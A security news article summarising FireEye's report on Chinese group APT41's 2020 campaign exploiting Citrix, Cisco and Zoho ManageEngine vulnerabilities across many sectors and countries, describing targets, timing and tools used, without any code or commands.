The Chinese state-sponsored group APT41 has been at the helm of a range of attacks that used recent exploits to target security flaws in Citrix, Cisco, and Zoho appliances and devices of entities from a multitude of industry sectors spanning the globe.
It is not known if the campaign that started in January 2020 was designed to take advantage of companies having to focus on setting up everything needed by their remote workers while in COVID-19 lockdown or quarantine but, as FireEye researchers found, the attacks are definitely of a targeted nature.
Broadest Chinese APT campaign in years
As FireEye notes, APT41’s recent campaign is one of the most extensive ones Chinese cyber-espionage actors ran in recent years.
“Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers.” the report says.
APT41 is a highly prolific Chinese backed hacking group active since at least 2012 and known for espionage, cybercrime, and surveillance operations against a large array of industries, as well as individuals.
This group will usually rely on spear-phishing emails to infiltrate a target’s network and then use second-stage malware payloads to compromise the entire environment with the help of dozens of malicious tools while maintaining persistence.
Citrix devices under attack
In their latest campaign, the APT41 hackers were observed while attacking targets from banking and finance, government, high tech, oil & gas to telecom, healthcare, media, and manufacturing.
During this series of seemingly targeted attacks, they focused their attention on entities from a multitude of countries including but not limited to the US, the UK, France, Italy, Japan, Saudi Arabia, and Switzerland.
“It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature,” FireEye’s researchers added.
While exploiting the CVE-2019-19781 vulnerability impacting Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers, APT41 only tried to exploit Citrix devices which hints that the group was using a list of previously identified servers collected during past Internet scans.
During these series of attacks, the APT41 actors were seen fluctuating between periods of high exploitation activity and intermissions.
As FireEye discovered, the hiatus intervals coincide either with Chinese holidays or with quarantine measures taken by the Chinese government in response to the COVID-19 pandemic.
“While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,” the researchers said.
Zoho and Cisco exploitation
On February 21, APT41 compromised a telecommunications organization’s Cisco RV320 router but FireEye researchers were unable to determine what exploit was used during this attack after analyzing the incident.
“It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload,” FireEye said.
APT41 then moved on to exploiting the CVE-2020-10189 Zoho ManageEngine zero-day no-auth remote code execution vulnerability that allows threat actors to execute arbitrary code as SYSTEM/root on unpatched systems.
Starting on March 8, one day after Zoho permanently fixed CVE-2020-10189, the Chinese group attacked over a dozen FireEye customers and managed to compromise the systems of at least five of them.
The CVE-2020-10189 exploitation activity is convoluted enough that you should probably just read the blog…but the TLDR is: exploit –> some combo of bitsadmin, powershell, Cobalt Strike backdoor, CertUtil, VMProtected Meterpreter downloader, BEACON shellcode pic.twitter.com/3FRTzre53H
— Christopher Glyer (@cglyer) March 25, 2020
The hackers then deployed a trial-version of the Cobalt Strike BEACON loader and dropped another backdoor used for downloading a VMProtected Meterpreter downloader.
This isn’t the first time APT41 used publicly available exploits to target internet-facing systems as they have been previously been observed by FireEye while abusing both CVE-2019-11510 in Pulse Secure VPN and CVE-2019-3396 in Atlassian Confluence as recently as October 2019.
“It is notable that we have only seen these exploitation attempts to leverage publicly available malware such as Cobalt Strike and Meterpreter,” the report concludes.
“While these backdoors are full-featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.
“This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.”
More details on APT41’s activities since the start of 2020 including indicators of compromise (IOCs) and a MITRE ATT&CK technique mapping are available at the end of FireEye’s report.